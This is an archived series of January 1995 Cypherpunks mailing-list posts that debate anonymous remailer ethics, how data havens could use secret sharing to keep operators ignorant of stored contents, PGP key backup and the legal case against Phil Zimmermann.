MIME-Version: 1.0
Content-Type: text/plain


    Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET)
    From: Mats Bergstrom <asgaard@sos.sll.se>

    This thread illustrates (at least if setup's like this are
    worthy of a place in Raph's list) that penet.fi is the safest
    way to go for the moment.

That depends on your threat model.  For most, chaining is safer than
penet.

    I would just hate it to have my head on the plate of a remailer
    operator who takes an interest in subtile ethical discussion of
    whether to sell me out or not.

Your characterization of what Homer has said strikes me as extremely
inaccurate.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 17 Jan 95 12:39:06 PST
To: Johnathan Corgan <jcorgan@scruznet.com>
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <Chameleon.4.01.950116182254.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <Pine.SUN.3.91.950117153148.11572A-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Jan 1995, Johnathan Corgan wrote:

> Date: Mon, 16 Jan 95 18:14:26 PST
> From: Johnathan Corgan <jcorgan@scruznet.com>
> To: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>,
>     Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Another problem w/Data Havens... 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Data havens that can split data to two or more locations in seperate 
> >jurisdictions can effectively ignore attention from authorities not 
> >related to the site management or site preformance.  Encryption mandated 
> >sites can also take this stance, while encryption is legal in any event.
> 
> It just occurred to me when reading this another method for ensuring the
> "I can't tell what's in it" condition with a data haven operator.  Why not
> use a secret sharing system where the contraband data is split into a number
> of pieces and sent to different havens?  It could be argued that the individual
> pieces are not the same as the whole, and there is absolutely no way the
> operator could recover the original from a given piece (thus providing
> plausible deniability.)
> 
> Using M by N secret sharing, with M < N, you build in some redundancy in case
> one of the havens gets shutdown.

This was essentially my point, phrased much more precisely.

I believe this has been suggested, even discussed at length before on the 
list.

Just from a structure standpoint, the haven could segment the data, 
use some sort of encryption, and then send an encrypted message 
containing the "resegmenting key."

Theoretically the haven would destroy the resegmenting key after 
generating it and sending it, leaving the original sender with the only 
copy.

Trust in the data haven operator is bolstered by his or her interest in 
not knowing the contents of the data, or the retrevial key for the data, 
less he or she be vulnerable to authority scrutiny.

> ==
> Johnathan Corgan       "Violence is the last refuge of the incompetent."
> jcorgan@scruznet.com                    -Isaac Asimov

-uni- (Dark)

--
073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 17 Jan 95 12:49:59 PST
To: wcs@anchor.ho.att.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501170829.AA10034@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950117154344.11572B-100000@access4.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995 wcs@anchor.ho.att.com wrote:

> Date: Tue, 17 Jan 95 03:29:17 EST
> From: wcs@anchor.ho.att.com
> To: grendel@netaxs.com
> Cc: cypherpunks@toad.com
> Subject: Re: Another problem w/Data Havens...
> 
> 
> Liability is a legal issue, not a technical one.
> (Catchability is a technical issue.)

BING!

> 
> Alice asks Dave's Data Haven to store stuff, and later retrieves it.
> Dave doesn't want to be able to know what's in it.
> There are three main threat periods - at receipt of the data,
> during storage, and at retrieval.  Secret sharing is great for
> the storage period, assuming the data havens are in different
> jurisdictions and the cops can't force the operator (Dave)
> to go retrieve all the pieces.  
> 
> However, at receipt of the data, it's all in one place, Dave's inbox.
> If Alice encrypted it safely, or secret-shared it herself, great!
> But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime,
> or Alice's key has been compromised, anything in Dave's inbox is
> still toast, even if anything that's been split and stored is safer
> than if it had been stored unsplit.  So he either needs to split it fast,
> shortening the window, or find a way to blind his mail before processing it,
> or split it before reading it.

I found this very insightful.  All the more reason to mandate encryption, 
or to encrypt all plaintext on arrival.

> 
> Splitting before reading isn't impossible in a stream environment.
> Define a protocol that looks like SMTP, but opens up three outgoing 
> streams as well as an incoming stream, and uses standard mail formats.
> While reading the headers from Alice (either the real contents or just the
> handshakes at the beginning), Dave's receiver thinks about them
> and sends some meaningful headers to Moe, Larry, and Curly.
> Once the message body starts, instead of storing the incoming bytes,
> Dave sends every other byte to Moe or Larry, and the xors to Curly.*
> If he wants to get fancy, he can even encrypt the data with a stream
> cypher as he goes along, giving half the key to each of them.
> That way, Dave's system really only has knowledge of the headers,
> plus one line at a time of incriminating data on the fly.
> And his partners can't give anything away either; they're just stooges.
> 
> * If the connections to and storage by Moe and Larry are reliable enough,
> Curly doesn't really need to be involved, but the xor business lets
> you reconstruct everything from just two parts.

I like the pure elegance of this solution.
Are there implemented DH codes running around anywhere?

> 
> 
> 			Bill
> 			
> "Privacy is not a crime!"			
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Gone Fission)
Date: Tue, 17 Jan 95 13:14:09 PST
To: cypherpunks@toad.com
Subject: Re: Abuse and Remailer Ethics
Message-ID: <199501172119.QAA09578@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950116205019.7181A-100000@math>,
Homer Wilson Smith <homer@math.cornell.edu> wrote:
>     I am not presently on cypherpunks, so please include me in the
>replies.

It's a little (not a lot) rude to start a substantive conversation and not
to listen in to the list for duration.  Just my O.

>     Does a list owner have the right to demand blocking to his list,
>with or without a vote of the list readers?  I would say yes.

And the power.  They can filter them out at the level of the mailing address.
Tell 'em to do their own work.  Put it gently and politely, but if they're
the list admin, they can easily filter out mail from specific addresses
without bugging a busy remailer operator who is, after all, doing a service
to the net much as the list admin is.  "Scenario them rosily with a
calculated ambiguity which they will be sure to understand."
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxv4hRNhgovrPB7dAQFBbwP/XCzg7Zyib0ZXPDPpv/0QKR+jKYCchJ+r
bcIfM4g+rP1uxyuBj1ErLhvc18Dpu/zjp5u2ZR5F9L6OYEF6YrYrUhgq1hsTNc1U
lHZsCNr8ZuOpfU/dLAeLvrZLNak39eVmoMnInSNO0q7dUoMnaKz8CjZAQvy+TK4A
eqle4P9fmSM=
=4z27
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxw0MioZzwIn1bdtAQGx2AF/WUf23vWGlV6WXUfQ2BBYuEodnnUvN5GM
hYLbdgZ7BO6NWpgbLSPQYCs2X4yWMqVW
=m+km
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: habs@cmyk.warwick.com (Harry S. Hawk)
Date: Tue, 17 Jan 95 13:22:51 PST
To: cypherpunks@toad.com (Good Guys)
Subject: A Reason for Privacy
Message-ID: <9501180022.AA08869@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I had a talk today with our Office Manager which reveals an other
reason why we need anon. system.

That is to say a good reason we can hold up to the press, media and
other people..

The Example:

Job Ads..

This are often non on an Anon. basis. For example, the new york times
will function as an anon. forwarder of job resumes...

The office manager needs to have both the company name and the name of
the person getting the resumes to be kept anonymous...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 17 Jan 95 13:52:20 PST
To: cypherpunks@toad.com
Subject: Netscape & future developments
Message-ID: <v01510101ab41a89797eb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain




>
>Date: Tue, 17 Jan 1995 10:42:50 -0800
>From: wbarr@leland.stanford.edu (William P. Barr)
>To: apple-internet-providers@medraut.apple.com
>Subject: Netscape & future developments
>Message-ID: <v01510101ab41b9ba4234@[36.8.0.140]>
>
>Hello All,
>
>I just attended a talk given by Marc Andreessen, co-founder of Netscape,
>and he had several interesting things to say that you all might be
>interested in.
>
>First off, Netscape plans to make the API to it's browser available to 3rd
>party developers in the near future.  With a list of over 1300 things users
>want added to the browser, he believes that other developers will be much
>more effective at filling the demand.  Could this move spawn the "Visual
>Basic" of the internet?  Perhaps ...
>
>Second, Netscape has formed some key partnerships.  Most notably, DEC and
>Sun will be redistributing Netscape server software through its channels.
>It has also created an alliance with Bank Of America and Mastercard for
>secured cash transactions.  Netscape is also providing all the servers for
>MCI's www services.
>
>Third, he said that by the end of this year, secured transactions will no
>longer be rare.  Currently the model of a transaction is:
>
>        Customer ---> Merchant ---> Card Issuer
>
>The new model will  be:
>
>        Customer ---> Card Issuer ---> Merchant
>
>This new model requires that you only have to trust your card issuer and
>the communications link from your machine to theirs.  The Card Issuer will
>then verify the credit and notify the merchant of the validity of the
>purchase.  There are two major ramifications:  First, you no longer have to
>worry about the integrity of the merchant; second, this will allow card
>issuers to change the rules for giving merchant status to businesses.  Marc
>predicted that by the end of the year, getting merchant status from several
>major card issuing banks will greatly simiplified, allowing dozens of
>businesses/services to spring up on the net, almost overnight.
>
>Finally, he said that the company is in the process of settling on a
>distributor to get the browser into the retail store-fronts.
>
>If you have any more questions, just ask.
>
>Bill
>
>*********************************************
>*William P. Barr                                        (415) 723-6632 (work)*
>*Multimedia Coordinator                          (415) 725-7398 (fax)   *
>*Stanford Computer Forum
>*
>*ERL 448/450                            wbarr@cs.stanford.edu (business)*
>*Stanford, CA, 94305-4055    wbarr@leland.stanford.edu (leisure)*
>*USA                                      "My opinion is mine and only mine*
>*********************************************
>

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 17 Jan 95 16:57:01 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Does encrypted equal safe?
In-Reply-To: <9501172355.AA12246@eri.erinet.com>
Message-ID: <Pine.SUN.3.91.950117165334.18688B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

> ...
> Which is exactly why the encrypt on receipt or decrypt on delivery ideas 
> won't work.  You have to be provably ignorant of the data.

In my law school they taught that the burden of proof in a 
criminal case was on the government.

 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Tue, 17 Jan 95 16:05:30 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <v02110104ab420ae6be90@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 PM 1/17/95, Paul J. Ste. Marie wrote:
>At 03:29 AM 1/17/95 EST, bill.stewart@pleasantonca.ncr.com +1-510-484-6204
>wrote:
>> ... That way, Dave's system really only has knowledge of the headers,
>>plus one line at a time of incriminating data on the fly. ...
>
>I don't see exactly what that is buying Dave.  The entire contents were
>still transmitted to him, so the ability to see the entire file was still
>present, which means he could have, had he chosen to do so, prevented the
>file from residing on his system, and could have screened it.  It's
>essentially only the word of the haven op that shows he didn't examine the
>entire file.

That's the main reason why I like my idea of having a trusted encryptor.
Nobody's suggested that the current timestamp operators would be in Deep
Doo-Doo if they timestampped some piece of thoughtcrime; why should
somebody who encrypts be any different?

The service could even be advertised as a different form of timestamping
(or notarizing). Not only do you get the file back signed, but you get it
back encrypted and signed.

>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 17 Jan 95 15:42:33 PST
To: wcs@anchor.ho.att.com
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <9501170829.AA10034@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950117183343.17037A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995 wcs@anchor.ho.att.com wrote:

> The former case is easy,
> if you can rent computer space in a country with a non-meddling
> government and good net access (or an easily rentable government :-).)
> For those of us in the latter situation, the discussion's still
> useful...

	Point taken.

> However, at receipt of the data, it's all in one place, Dave's inbox.
> If Alice encrypted it safely, or secret-shared it herself, great!
> But if Alice is a narc trying to entrap Dave with plaintext ThoughtCrime,
> or Alice's key has been compromised, anything in Dave's inbox is
> still toast, even if anything that's been split and stored is safer
> than if it had been stored unsplit.  So he either needs to split it fast,
> shortening the window, or find a way to blind his mail before processing it,
> or split it before reading it.

	I could write a procmail recipe and a script in about an hour to
automatically secret-share-split and redistribute the incoming submission.
If the authorities attempt to indict you for possessing illegal
information / kiddie porn / whatnot, they have to prove that you
interfered with the automatic redistribution process and examined the
contents of the submission. If you in fact did not look at the submission,
they would have a difficult time doing so. 

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 17 Jan 95 15:54:19 PST
To: Remailer-Operators@c2.org>
Subject: Re: Abuse and Remailer Ethics
Message-ID: <9501172343.AB11989@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote:
> ... So I'm tempted to say "tough luck" to newsgroups that
>don't like receiving anonymous posts. The alternative is for people
>interested to create a moderated newsgroup, where of course the moderator
>could refuse to allow anonymosu posts with or without the remailer
>operators cooperation. ...

Another, and less onerous alternative, is to simply stick encrypted reply-to 
blocks on messages to newsgroups.  At that point there's no real difference 
between the anon post and a post from a system that doesn't provide real 
name<->userid mappings, and the flames can go straight from the newsgroup to 
the instigator without involving the remailer op.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 17 Jan 95 16:04:13 PST
To: cypherpunks@toad.com
Subject: Re: Does encrypted equal safe?
Message-ID: <9501172355.AA12246@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:28 PM 1/17/95 -0800, Eric Hughes wrote:
> ... Meaning is subjective.  If I see encrypted text, am I to be held
>responsible for having seen through an encryption for which I hold not
>the key?  Merely because someone knows a transformation into a
>disapproved form does not mean that I do. ...

Which is exactly why the encrypt on receipt or decrypt on delivery ideas 
won't work.  You have to be provably ignorant of the data.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Tue, 17 Jan 95 18:21:28 PST
To: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Subject: Re: Another problem w/Data Havens...
Message-ID: <v0211010bab42294fde97@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:03 PM 1/17/95, Robert Rothenberg wrote:
>> Doo-Doo if they timestampped some piece of thoughtcrime; why should
>> somebody who encrypts be any different?
>>
>> The service could even be advertised as a different form of timestamping
>> (or notarizing). Not only do you get the file back signed, but you get it
>> back encrypted and signed.
>
>Hmmm.... Of course in some cases one may not want the file to be returned
>with a signature and timestamp (might be incriminating evidence, depending
>on what one wants stored and the overall political situation where one is,
>etc....).  Of course that does sound useful.

Just as a notary public does not certify that a given document is truth,
but rather that it is what it is and the signature belongs to the person
who it appears to belong to, a public timestamp/notary/encryption service
on the 'net would certify the existence of that document in that form at
that time. No more, no less.

If I recall correctly, a notary can certify a sealed envelope without
knowing its contents, by putting a tamper-proof seal on it. Sound familiar?
I'll try to find a notary to see if that's the case. If so, we're got as
good a precedent as we'll ever find for just about anything.

>Rob <rrothenb@ic.sunysb.edu> Finger for public key

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Tue, 17 Jan 95 19:43:06 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rUB8U-0006GgC@hackvan.com>
Message-ID: <m0rURHN-0006GgC@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes wrote:
> 
> I'll tell you one really useful facility for offsite storage, and
> that's private key backup.  Use a secret sharing arrangement, say 5
> out of 7 reconstruction, and send out 7 chunks.  Now, give a different
> pointer-to-chunk to each of 7 different people.  In the case of
> catastrophe, you can recover your key.
> 

I'll second Eric on the utility of this practice.  I should've done this...
I lost a new pgp key when my hard disk hit the fan last month.  I can't even
revoke it...  

    Stig

FYI:  The key to ignore is 0x31F61BA9.  The new key is on a server near you.

    	  Key for user ID: Stig <stig@hackvan.com>
	  1024-bit key, Key ID 6202A715, created 1995/01/03
          Key fingerprint =  58 0C 16 D5 CD 27 EE 37  BB EC 47 73 36 12 9B 96 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rseymour@reed.edu (Robert Seymour)
Date: Tue, 17 Jan 95 19:49:47 PST
To: rishab@dxm.ernet.in
Subject: Re: Known data havens for pirates? Doubtful
In-Reply-To: <gate.ms64yc1w165w@dxm.ernet.in>
Message-ID: <m0rURMu-0000wyC@shiva.reed.edu>
MIME-Version: 1.0
Content-Type: text/plain


In the world according to rishab@dxm.ernet.in:
> I forget who wrote:
> > blame them. Copyrighted data on a server in a jurisdiction that
> > doesn't acknowledege the copyrights - a prime use for Data Havens
> > when they come of age.

> I suppose you _are_ aware that the US has threatened China with punitive
> duties on $100 BILLION dollars worth of trade, and that China has started
> holding some show trials (without shutting down its state-owned CD-piracy
> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
> however, despite howls of protest even China is likely to knuckle down 
> eventually. What may be likely is distributed piracy markets, such as 
> described in Tim's BlackNet spoof.

One of the major features of the Uraguay round of the GATT (General
Agreement on Tariffs and Trade) is a large revision of internation patent
and copyright law (which is currently de facto non-existent in many 
countries).  Intellectual copyrights are still somewhat vague in the
current agreement, but there will be a course for hearing through the
WTO (World Trade Organization).

In the case of Asian countries, APEC (Asian Pacific Economic Conference)
is laying out intellectual property right regulations for conference 
members (the US, Canada, and most of the Pacific Rim including China).
Though these agreements are still a long way from clearing up copyright
disputes and their enforcement remains dubious, they should help to 
stop such blatant infractions of copyright status.

Of course, one need not look to China for copyright violations, just take
a look at all the video tape pirates in New York or other cities ...

|Robert

-- 
Robert Seymour					rseymour@reed.edu
Reed College Artificial Life Project		NeXTmail, MIME, PGP accepted

  WWW Pages  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Tue, 17 Jan 95 17:03:52 PST
To: Ben.Goren@asu.edu
Subject: Re: Another problem w/Data Havens...
In-Reply-To: <v02110104ab420ae6be90@[129.219.97.131]>
Message-ID: <9501180103.AA16543@toad.com>
MIME-Version: 1.0
Content-Type: text



Ben.Goren@asu.edu wrote:

> Doo-Doo if they timestampped some piece of thoughtcrime; why should
> somebody who encrypts be any different?
> 
> The service could even be advertised as a different form of timestamping
> (or notarizing). Not only do you get the file back signed, but you get it
> back encrypted and signed.
> 

Hmmm.... Of course in some cases one may not want the file to be returned
with a signature and timestamp (might be incriminating evidence, depending
on what one wants stored and the overall political situation where one is,
etc....).  Of course that does sound useful.

> 
> --
> Ben.Goren@asu.edu, Arizona State University School of Music
>  Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.
> 

Rob <rrothenb@ic.sunysb.edu> Finger for public key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 17 Jan 95 11:13:11 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <199501171405.AA17997@xs1.xs4all.nl>
Message-ID: <Pine.HPP.3.91.950117193541.25204A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 17 Jan 1995, Name withheld on request wrote:

> wonders to what end remailers are being put by people who are worried
> about being "sold out".

The fundamental principle here is that an e-mail message is just so
many bits of 1's and 0's. It can never, in it's own capacity, steal,
molest or kill. It is therefore not unethical to run a no-log 'fortress
remailer' and auto-delete ALL complaints, without exception. It might
not be feasible to do so if one wants to stay out of jail, but hope-
fully this will change with the rapid increase in country domains
and the soon-to-come digicash market. Discussions of programming to
make fortress remailers work and to make them easily exportable to
African Linux-boxes are interesting. So are discussions of expected
repercussions on society. Ethical discussions of what is abuse or not
are better left to the clergy.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 17 Jan 95 11:50:55 PST
To: cypherpunks@toad.com
Subject: remailer security
In-Reply-To: <ab41c1b306021004669b@[132.162.201.201]>
Message-ID: <Pine.HPP.3.91.950117202620.25204C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


> If you chain it through 3 or 4 remailers with PGP, then pretty much all 3
> or 4 of them have got to decide to sell you out. I trust Julf a lot, but
> I'm not sure I trust him four times as much as every other remailer
> operator. Or something like that.

I am familiar with this argument and agree. In the discussed case
the alleged abuser had only used one remailer (on a site that keeps
logs world readable at that!). Laziness, I guess. There are ways of
multiple chaining for the lazy, though: C2 lets you pick the chained
sites by clicking on a web-page (but does it encrypt??).

Mats 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Tue, 17 Jan 95 18:25:10 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <9501172343.AB11989@eri.erinet.com>
Message-ID: <Pine.SUN.3.91.950117212353.21124A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     This will only work if ALL posts have anonymous reply blocks
added, or if the posting only goes through one remailer, as there
is no way the first on the chain can know that the end destination
is a listserv, no?
 
     Homer


On Tue, 17 Jan 1995, Paul J. Ste. Marie wrote:

> At 10:27 PM 1/16/95 -0500, Jonathan Rochkind wrote:
> > ... So I'm tempted to say "tough luck" to newsgroups that
> >don't like receiving anonymous posts. The alternative is for people
> >interested to create a moderated newsgroup, where of course the moderator
> >could refuse to allow anonymosu posts with or without the remailer
> >operators cooperation. ...
> 
> Another, and less onerous alternative, is to simply stick encrypted reply-to 
> blocks on messages to newsgroups.  At that point there's no real difference 
> between the anon post and a post from a system that doesn't provide real 
> name<->userid mappings, and the flames can go straight from the newsgroup to 
> the instigator without involving the remailer op.
> 
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Tue, 17 Jan 95 18:35:45 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Abuse and Remailer Ethics
In-Reply-To: <9501172032.AA29703@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.91.950117213146.21124H-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     The POINT is that if you chain and use pgp the remailer operator
CAN'T sell you out.  Whether or not the reop discusses or promises never
to sell you out is meaningless when the cards are down.  Trusting someone
because they SAY they are trustable is a fools game. So up front, I say
"Who me, trustable?  Hah!", and then let people use the technology to make
sure their stuff is safe.  PGP can't be broken, and chaining can't be
traced without LOTS of difficulty, and frankly reops have little interest
really in reading people's private mail, especially when it is pgp'd, let
alone tracing them for postings that they don't even know what's being
said in them!  Right? 
 
     Homer

On Tue, 17 Jan 1995, Rick Busdiecker wrote:

>     Date: Tue, 17 Jan 1995 11:06:16 +0100 (MET)
>     From: Mats Bergstrom <asgaard@sos.sll.se>
> 
>     This thread illustrates (at least if setup's like this are
>     worthy of a place in Raph's list) that penet.fi is the safest
>     way to go for the moment.
> 
> That depends on your threat model.  For most, chaining is safer than
> penet.
> 
>     I would just hate it to have my head on the plate of a remailer
>     operator who takes an interest in subtile ethical discussion of
>     whether to sell me out or not.
> 
> Your characterization of what Homer has said strikes me as extremely
> inaccurate.
> 
> 			Rick
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 17 Jan 95 21:57:08 PST
To: cypherpunks@toad.com
Subject: EE Times on PRZ
Message-ID: <199501180556.VAA25844@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Jan 16 issue of EE Times has an excellent article on the legal
controversy surrounding Phil Zimmermann and PGP, positioned top-right
front-cover for maximal exposure.  It describes the aftermath of a
meeting last week between Phil's attorney, Philip Dubois, and the
government lawyer handling the case.  "'We told the prosecutor our
concerns,' Dubois said.  'He agreed to consider them.  We might hear
back in a month or two.  He didn't make any promises.'"

(Sometimes it seems like the gov't is dragging this case out
intentionally.  I believe the uncertainty does have a chilling effect on
private development of strong crypto, which would be gone if the
government announced it was not going to pursue the case, or if they did
bring charges and lost.)

Another interesting quote: "Zimmermann is not in danger of being indicted
for willfully exporting PGP. Rather, the U.S. attorney's office, here, is
considering charging him for making PGP available in such a manner that
it could be exported by a third party."  What the hell is this?  Can
anyone point to the statute they may be referring to here?  This seems
awfully broad.

This, from a sidebar, is really surprising:  "In contrast, public keys
allow the overt publication of an encryption key, because decryption keys
can only be derived through a mathematically difficult process, such as
large prime-number factoring.  Contrary to popular belief, the NSA can
decrypt public keys of most practical key sizes."  I wonder what this
means?  If it is a claim that the NSA can factor 1024 bit moduli that
would certainly come as a big surprise.  If they are saying that they can
do 512 bits that would be more believable although of interest.  It is
strange that the author would include a statement like this without
attribution or evidence.

Generally, the article is very favorable towards Phil and an excellent
overview of the case.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxytnBnMLJtOy9MBAQHGnAH/TAOr6TNchZjCyMESeDdOf1seXTkfMbMY
3qrL91OmjwxDIBDkzszrgizwadKwWYn65yOY3yJ4Wk/xUcNwKFnk1Q==
=PoYj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 17 Jan 95 23:30:20 PST
To: rishab@dxm.ernet.in
Subject: Re: Known data havens for pirates? Doubtful
In-Reply-To: <gate.ms64yc1w165w@dxm.ernet.in>
Message-ID: <199501180700.XAA14684@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The comments about data havens have been interesting to read. Being
the analytic-retentive type, I like to view things as tables and
graphs, of such things as: who knows location (nobody, some,
everybody) vs. types of data supported, for example. But I won't make
such a table here, now.

[Note on my responses. Netcom is not accepting mail connections, so
Cypherpunk mail basically doesn't arrive from the early morning to
very late in the evening. This has to do with toad not using "MX mail
records," as near as we could figure out. Please don't send
suggestions, as I can't get either toad or Netcom changed. I merely
point this out to explain why I basically am out of the debate during
the day. The information highway is becoming a dirt road.]

I mainly agree with Rishab's point: the idea of a known, fixed
location that carries Infocalypse material is deeply flawed. Data
havens just won't be in known locations, at least not primarily.

While I found Bruce Sterling's "data havens" in the Caribbean, Africa,
and Asia interesting and provocative, they made no sense as viable,
stable entities. No site which is _known_ to be a Warez site, a
bootleg Nazi medical data site, a copyright violation haven, etc.,
will last for long. Whether knocked out as a result of a
U.N. Resolution (infinitely easier than zapping Saddam), or sabotaged
the way the French SDECE hit the "Rainbow Warrior," or merely
subverted at ground level, the site cannot last. "The Center cannot
hold."

Fortunately, there is no reason for data havens to be in fixed
locations. Or in traceable, identifiable locations.

My BlackNet thought experiment was much more than a mere Gedanken
experiment: as many of you learned, it was/is a real key, and 2-way
communication has happened. Of course, you mostly all know I was the
instigator (and those who don't haven't followed the debate and/or
haven't read the Cyphernomicon section on BlackNet).

rishab@dxm.ernet.in wrote:

> I suppose you _are_ aware that the US has threatened China with punitive
> duties on $100 BILLION dollars worth of trade, and that China has started
> holding some show trials (without shutting down its state-owned CD-piracy
> factories). It's not going to be easy to find a country more willing and
> able to ignore international copyright law (Berne Convention etc) than China;
